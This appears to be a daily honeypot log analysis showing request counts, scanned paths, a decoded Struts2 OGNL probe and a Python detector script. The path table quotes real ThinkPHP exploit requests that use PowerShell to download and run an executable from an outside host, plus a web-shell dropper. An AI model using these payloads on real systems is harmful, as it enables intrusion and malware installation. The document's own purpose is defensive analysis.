Simple honeypot analysis, day 24

The number of accesses on 2019-04-24 was 562.

■ Number of source IP addresses: 57.

■ Methods and their counts:

method    count
CONNECT   4
GET       261
HEAD      2
POST      294
PROPFIND  1
total     562

■ Request paths and their counts:

path  method  count
/  GET  41
/  HEAD  1
/  PROPFIND  1
/_404.php  POST  1
/_query.php  GET  1
/.php  POST  1
/.well-known/security.txt  GET  1
//MyAdmin/scripts/setup.php  GET  2
//phpmyadmin/scripts/setup.php  GET  2
//pma/scripts/setup.php  GET  1
/%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ognlUtil%3d%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse()).(%23res.addHeader(%27eresult%27%2c%27struts2_security_check%27))%7d/index.action  POST  1
/%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ognlUtil%3d%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).%23context.setMemberAccess(%23dm)))).(%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse()).(%23res.addHeader(%27eresult%27%2c%27struts2_security_check%27))%7d/login.action  POST  1
/099.php  POST  1
/1.php  POST  6
/1111.php  POST  1
/12.php  POST  1
/1213.php  POST  1
/123.php  POST  1
/1hou.php  POST  1
/1ndex.php  POST  1
/1q.php  POST  1
/1x.php  GET  1
/2.php  POST  2
/3.php  POST  1
/51.php  POST  1
/51314.php  POST  1
/520.php  POST  1
/5201314.php  POST  1
/56.php  POST  1
/666.php  POST  1
/7.php  POST  1
/777.php  POST  1
/92.php  POST  1
/9510.php  POST  1
/9678.php  POST  1
/a.php  POST  1
/aa.php  POST  1
/aaa.php  POST  1
/aaaa.php  POST  1
/aaaaaa1.php  POST  1
/acadmin.php  GET  1
/admin-scripts.asp  GET  2
/admin/index.php  GET  1
/admin/mysql/index.php  GET  1
/admin/mysql2/index.php  GET  1
/admin/phpMyAdmin/index.php  GET  3
/admin/phpmyadmin2/index.php  GET  1
/admin/pma/index.php  GET  2
/Administrator.php  POST  1
/admn.php  POST  1
/ak.php  POST  1
/ak47.php  POST  1
/ak48.php  POST  1
/Alarg53.php  POST  1
/angge.php  POST  1
/aotu.php  POST  1
/aotu7.php  POST  1
/api.php  POST  2
/app.php  POST  1
/App986ca785.php  POST  1
/appserv.php  GET  1
/aw.php  POST  1
/bak.php  POST  1
/boots.php  POST  1
/cacti/plugins/weathermap/editor.php  GET  1
/cadre.php  POST  1
/cainiao.php  POST  1
/caonma.php  POST  1
/cc.php  POST  1
/cere.php  POST  1
/ceshi.php  POST  1
/cgi-bin/authLogin.cgi  GET  1
/chaoda.php  POST  1
/claroline/phpMyAdmin/index.php  GET  2
/cmd.php  GET  2
/cmd.php  POST  1
/cmdd.php  GET  1
/cmv.php  GET  1
/cn.php  POST  1
/cnm.php  POST  1
/composer.php  GET  1
/composers.php  GET  1
/conf.php  POST  1
/conf1g.php  POST  1
/confg.php  POST  4
/conflg.php  POST  2
/coon.php  POST  1
/core.php  POST  1
/cxfm666.php  POST  1
/d.php  POST  1
/d7.php  GET  1
/data.php  POST  1
/db__.init.php  POST  1
/db_cts.php  GET  1
/db_dataml.php  POST  1
/db_desql.php  POST  1
/db_pma.php  GET  1
/db_session.init.php  POST  1
/db.init.php  POST  1
/db.php  POST  1
/db/index.php  GET  1
/dbadmin/index.php  GET  1
/default.php  POST  1
/defect.php  POST  1
/desktop.ini.php  GET  1
/dexgp.php  POST  1
/diy.php  POST  1
/Drupal.php  GET  1
/erba.php  POST  1
/errors.php  POST  1
/erwa.php  POST  1
/fack.php  POST  1
/favicon.ico  GET  1
/fb.php  POST  1
/feixiang.php  POST  1
/function.inc.php  POST  1
/fusheng.php  POST  1
/general.php  POST  1
/godkey.php  POST  1
/guai.php  POST  1
/h1.php  POST  1
/hack.php  POST  1
/hacly.php  POST  1
/hell.php  GET  1
/hell.php  POST  1
/hello.php  POST  2
/help-e.php  GET  1
/help.php  GET  1
/help.php  POST  1
/hh.php  POST  1
/hm.php  POST  1
/home.php  GET  1
/htdocs.php  GET  1
/htfr.php  POST  1
/hue2.php  GET  1
/HX.php  POST  1
/images/vuln.php  GET  1
/index.action  POST  7
/index.php  GET  1
/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP  GET  1
/index1.php  POST  1
/indexa.php  POST  1
/info.php  POST  1
/info1.php  POST  1
/infoo.php  POST  1
/infos.php  POST  1
/ip.php  POST  1
/izom.php  GET  2
/j.php  POST  1
/java.php  GET  1
/knal.php  GET  1
/kvast.php  POST  1
/l6.php  POST  1
/l7.php  POST  1
/l8.php  POST  1
/lala-dpr.php  GET  1
/lala.php  GET  1
/lang.php?f=1  GET  1
/lanke.php  POST  1
/lanyecn.php  POST  1
/lapan.php  POST  1
/ldw.php  POST  1
/liangchen.php  POST  1
/libraries/joomla/jmail.php?waled=1  GET  1
/libraries/joomla/jmails.php?waled=1  GET  1
/libraries/joomla/wl.php?0=1  GET  1
/license.php  GET  1
/lindex.php  POST  1
/link.php  POST  1
/linkr.php  POST  1
/linkx.php  POST  1
/linux.php  POST  1
/linux1.php  POST  1
/linuxse.php  POST  1
/ljb.php  POST  1
/lm.php  POST  1
/lmn.php  POST  1
/log.php  GET  1
/log.php  POST  1
/login.action  POST  7
/logon.php  GET  1
/lol.php  GET  1
/lost.php  POST  1
/lucky.php  POST  2
/lx.php  POST  1
/m.php  POST  1
/m.php?pbid=open  POST  1
/manager/html  GET  46
/mazi.php  POST  1
/MCLi.php  POST  2
/meng.php  POST  1
/miao.php  POST  1
/min.php  POST  1
/mm.php  POST  1
/muhstik-dpr.php  GET  1
/muhstik.php  GET  2
/muhstik2.php  GET  1
/muhstiks.php  GET  1
/muieblackcat  GET  1
/mx.php  POST  1
/MyAdmin/index.php  GET  2
/myadmin2/index.php  GET  1
/mybestloves.php  POST  1
/mysql_admin/index.php  GET  1
/mysql-admin/index.php  GET  1
/mysql.php  POST  1
/mysql/admin/index.php  GET  1
/mysql/dbadmin/index.php  GET  1
/mysql/index.php  GET  1
/mysql/mysqlmanager/index.php  GET  1
/mysql/sqlmanager/index.php  GET  1
/mysqladmin/index.php  GET  1
/mz.php  POST  1
/neko.php  POST  1
/new_license.php  GET  1
/no.php  POST  1
/nuoxi.php  POST  1
/okokok.php  POST  1
/orange.php  POST  1
/ou2.php  POST  1
/p.php  POST  1
/p34ky1337.php  POST  1
/payload.php  GET  2
/paylog.php  POST  2
/pe.php  POST  1
/php.php  POST  1
/php2MyAdmin/index.php  GET  1
/phpAdmin/index.php  GET  2
/phpiMyAdmin/index.php  GET  1
/phpinfi.php  POST  1
/phpini.php  POST  1
/phpma/index.php  GET  1
/phpmy/index.php  GET  1
/phpMyAbmin/index.php  GET  1
/phpMyAdm1n/index.php  GET  2
/phpMyadmi/index.php  GET  1
/phpMyAdmin__/index.php  GET  1
/phpMyadmin_bak/index.php  GET  1
/phpMyAdmin-4.4.0/index.php  GET  1
/phpmyadmin-old/index.php  GET  1
/phpMyAdmin._/index.php  GET  1
/phpMyAdmin.old/index.php  GET  1
/phpMyAdmin/index.php  GET  3
/phpmyadmin/phpmyadmin/index.php  GET  3
/phpMyAdmin/scripts/db___.init.php  GET  2
/phpmyadmin/scripts/setup.php  GET  2
/phpMyAdmin+++---/index.php  GET  1
/phpmyadmin0/index.php  GET  1
/phpmyadmin1/index.php  GET  2
/phpMyAdmin123/index.php  GET  1
/phpmyadmin2/index.php  GET  1
/phpmyadmin2222/index.php  GET  1
/phpMyAdmina/index.php  GET  1
/phpMyAdminold/index.php  GET  1
/phpMyAdmins/index.php  GET  1
/phpMyAdmion/index.php  GET  1
/phpMydmin/index.php  GET  1
/phpNyAdmin/index.php  GET  1
/phppma/index.php  GET  1
/phpStudy.php  POST  2
/pk1914.php  POST  1
/plugins/weathermap/editor.php  GET  1
/pma-old/index.php  GET  1
/pma.php  POST  1
/pma/index.php  GET  2
/PMA2/index.php  GET  1
/pmamy/index.php  GET  1
/pmamy2/index.php  GET  1
/pmd_online.php  GET  1
/pmd/index.php  GET  1
/post.php  POST  1
/ppp.php  POST  1
/ppx.php  POST  1
/program/index.php  GET  1
/public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/tbtldtctbsjzqhp8813.exe');start%20C:/Windows/temp/tbtldtctbsjzqhp8813.exe  GET  1
/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20$action%20=%20$_GET['xcmd']  GET  1
/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/tbtldtctbsjzqhp8813.exe');start%20C:/Windows/temp/tbtldtctbsjzqhp8813.exe  GET  1
/pwd/index.php  GET  1
/python.php  POST  1
/q.php  POST  3
/qa.php  POST  1
/qaq.php  POST  1
/qaz.php  POST  1
/qq.php  POST  5
/qq5262.php  POST  1
/qw.php  POST  1
/qwe.php  POST  1
/qwq.php  POST  1
/qwqw.php  POST  1
/repeat.php  POST  1
/robots.txt  GET  1
/robots.txt  HEAD  1
/ruyi.php  POST  1
/rxr.php  GET  1
/s.php  POST  2
/s/index.php  GET  1
/s1.php  POST  1
/scripts/setup.php  GET  1
/sean.php  POST  1
/sha.php  POST  1
/shaAdmin/index.php  GET  1
/she.php  POST  1
/sheep.php  POST  1
/shell.php  GET  2
/shopdb/index.php  GET  1
/sitemap.xml  GET  1
/Skri.php  POST  1
/sllolx.php  POST  1
/spider.php  GET  1
/ss.php  POST  2
/ssaa.php  POST  1
/sss.php  POST  2
/super.php  POST  1
/system.php  POST  1
/t6nv.php  GET  1
/test.php  GET  1
/test.php  POST  3
/test123.php  POST  2
/text.php  GET  1
/tiandi.php  POST  1
/tmUnblock.cgi  POST  1
/tomcat.php  POST  1
/tools/phpMyAdmin/index.php  GET  2
/toor.php  POST  1
/typo3/phpmyadmin/index.php  GET  1
/u.php  POST  1
/undx.php  GET  1
/up.php  POST  1
/Updata.php  POST  1
/uploader.php  GET  1
/uu.php  POST  1
/uuu.php  POST  1
/v/index.php  GET  1
/ver.php  POST  1
/vuln1.php  POST  1
/w.php  POST  1
/wan.php  POST  1
/wanan.php  POST  1
/wb.php  POST  1
/wc.php  POST  1
/wcp.php  POST  1
/web/phpMyAdmin/index.php  GET  2
/webdav/  GET  1
/webslee.php  POST  1
/weixiao.php  POST  1
/win.php  POST  1
/win1.php  POST  1
/wp-admins.php  POST  1
/wp-config.php  GET  1
/wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php  GET  1
/wpc.php  GET  1
/wpo.php  GET  1
/wshell.php  POST  1
/wuwu11.php  POST  1
/www.php  POST  1
/www/phpMyAdmin/index.php  GET  2
/x.php  GET  1
/x.php  POST  4
/xampp/phpmyadmin/index.php  GET  1
/xiao.php  POST  1
/xiaobin.php  POST  1
/xiaodai.php  POST  1
/xiaohei.php  POST  1
/xiaoma.php  POST  1
/xiaomae.php  POST  1
/xiaomar.php  POST  1
/xiaomo.php  POST  1
/xiaoxi.php  POST  1
/xiaoyu.php  POST  1
/xp.php  POST  1
/xshell.php  POST  1
/xw.php  POST  1
/xw1.php  POST  1
/xx.php  POST  2
/xxx.php  POST  1
/xxxx.php  POST  1
/xz.php  POST  1
/yao.php  POST  1
/yj.php  POST  1
/yumo.php  POST  1
/z.php  GET  1
/z.php  POST  2
/zshmindex.php  POST  1
/zuo.php  POST  1
/zuoindex.php  POST  1
/zuos.php  POST  1
/zuoshou.php  POST  1
/zuoshss.php  POST  1
/zuoss.php  POST  1
/zxc0.php  POST  1
/zxc1.php  POST  2
/zxc2.php  POST  1
/zzk.php  POST  1
/zzz.php  POST  1
cn.bing.com:443  CONNECT  1
http://110.249.212.46/testget?q=23333&port=80  GET  2
http://api.ipify.org/  GET  1
http://httpheader.net/  GET  1
http://www.123cha.com/  GET  1
http://www.baidu.com/  GET  1
http://www.ip.cn/  GET  1
www.baidu.com:443  CONNECT  2
www.google.com:443  CONNECT  1

Log entries of interest

-=-= log entry #19 =-=-

[2019-04-24 09:52:30+0900] 103.79.155.162 hoge:80 "POST /%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ognlUtil%3d%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse()).(%23res.addHeader(%27eresult%27%2c%27struts2_security_check%27))%7d/index.action HTTP/1.1" 200 False 
POST /%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ognlUtil%3d%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse()).(%23res.addHeader(%27eresult%27%2c%27struts2_security_check%27))%7d/index.action HTTP/1.1
 Host: hoge:80
 Accept-Language: zh_CN
 User-Agent: Auto Spider 1.0
 Accept-Encoding: gzip, deflate
 Connection: close
 Content-Length: 0
 Content-Type: application/x-www-form-urlencoded

This targets Struts2. The OGNL expression is placed in the URL namespace segment ahead of /index.action (the path table shows the same payload ahead of /login.action as well), which is the S2-057 (CVE-2018-11776) pattern; CVE-2017-9791 (S2-048) is a different Struts2 bug, reached through a POST form field of the Struts 1 plugin, and does not match this request. Decoded, the payload first switches off OGNL's member-access restriction and clears the excluded-class and excluded-package lists, and then only calls addHeader('eresult','struts2_security_check') on the response: a vulnerable server reveals itself through that header and nothing else is touched.

It looks like reconnaissance traffic. On a closer look, the User-Agent is "Auto Spider 1.0".

Looking further, there are other log entries with User-Agent "Auto Spider 1.0", and every one of them was aimed at Struts2 vulnerabilities.
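As an added example that is not part of the original post: a Python script that reads log lines in the format shown above, rebuilds the method and path tallies from the top of the page, single-URL-decodes each request path and tags the Struts2 OGNL namespace probe together with the ThinkPHP invokefunction requests that also appear in the path table. The log lines, the host name hoge and the 203.0.113.x source addresses are constructed for the example, and the rule names (struts2_ognl, thinkphp_rce) are the example's own.

```python
# Added example (not code from the original page): parse honeypot access-log
# lines in the format this page shows, rebuild the per-method / per-path
# tallies, and flag the Struts2 OGNL (namespace-injection) and ThinkPHP
# invokefunction probes seen in the path table. All log lines below are
# constructed for the example; "hoge" and the 203.0.113.x sources are
# placeholders, not real observations.
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample: [timestamp] src_ip host:port "METHOD path HTTP/x" status flag
SAMPLE_LOG = r'''[2019-04-24 09:52:30+0900] 203.0.113.10 hoge:80 "POST /%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse()).(%23res.addHeader(%27eresult%27%2c%27struts2_security_check%27))%7d/index.action HTTP/1.1" 200 False
[2019-04-24 09:53:01+0900] 203.0.113.11 hoge:80 "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 200 False
[2019-04-24 10:01:12+0900] 203.0.113.12 hoge:80 "GET /phpMyAdmin/index.php HTTP/1.1" 404 False
[2019-04-24 10:02:45+0900] 203.0.113.12 hoge:80 "POST /1.php HTTP/1.1" 404 False
this line is not a request record and is skipped
'''

LINE_RE = re.compile(
    r'^\[(?P<ts>[^\]]+)\]\s+(?P<src>\S+)\s+(?P<host>\S+)\s+'
    r'"(?P<method>[A-Z]+)\s+(?P<path>\S+)\s+HTTP/[\d.]+"\s+(?P<status>\d+)'
)


def parse_line(line):
    """Return a dict for one request record, or None for lines that do not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def decode_path(path):
    """Single URL-decode: %25%7b -> %{ , %23 -> # , %27 -> ' (no recursive decoding)."""
    return unquote(path)


def classify(path):
    """Tag a request path by the exploit pattern it carries, or 'other'."""
    decoded = decode_path(path)
    route = decoded.split("?", 1)[0]
    # OGNL expression smuggled into the namespace ahead of an .action name
    if ("%{" in decoded or "${" in decoded) and route.endswith(".action"):
        return "struts2_ognl"
    # ThinkPHP 5 invokefunction -> call_user_func_array chain
    low = decoded.lower()
    if "invokefunction" in low and "call_user_func_array" in low:
        return "thinkphp_rce"
    return "other"


def response_markers(decoded):
    """Headers the OGNL payload asks the server to add; for the probe on this
    page that is the only observable effect (eresult: struts2_security_check)."""
    return re.findall(r"addHeader\('([^']*)'\s*,\s*'([^']*)'\)", decoded)


def summarize(log_text):
    """Rebuild the page's counts (total, sources, by method, by path) and list flagged probes."""
    records = [r for r in map(parse_line, log_text.splitlines()) if r]
    flagged = []
    for r in records:
        tag = classify(r["path"])
        if tag != "other":
            flagged.append({**r, "tag": tag, "decoded": decode_path(r["path"])})
    return {
        "total": len(records),
        "sources": len({r["src"] for r in records}),
        "by_method": Counter(r["method"] for r in records),
        "by_path": Counter((r["path"], r["method"]) for r in records),
        "flagged": flagged,
    }


if __name__ == "__main__":
    result = summarize(SAMPLE_LOG)
    print(f"accesses: {result['total']}, sources: {result['sources']}")
    for method, n in sorted(result["by_method"].items()):
        print(f"  {method:8} {n}")
    for hit in result["flagged"]:
        print(f"[{hit['tag']}] {hit['src']} {hit['method']} {hit['decoded'][:80]}")
        if hit["tag"] == "struts2_ognl":
            print("  response markers:", response_markers(hit["decoded"]))
```

The decode step is what makes the match work: on the wire the expression starts as %25%7b, so a rule written against the literal %{ in the raw path would miss it, and decoding more than once would turn any legitimate percent sequence in a query string into a false positive.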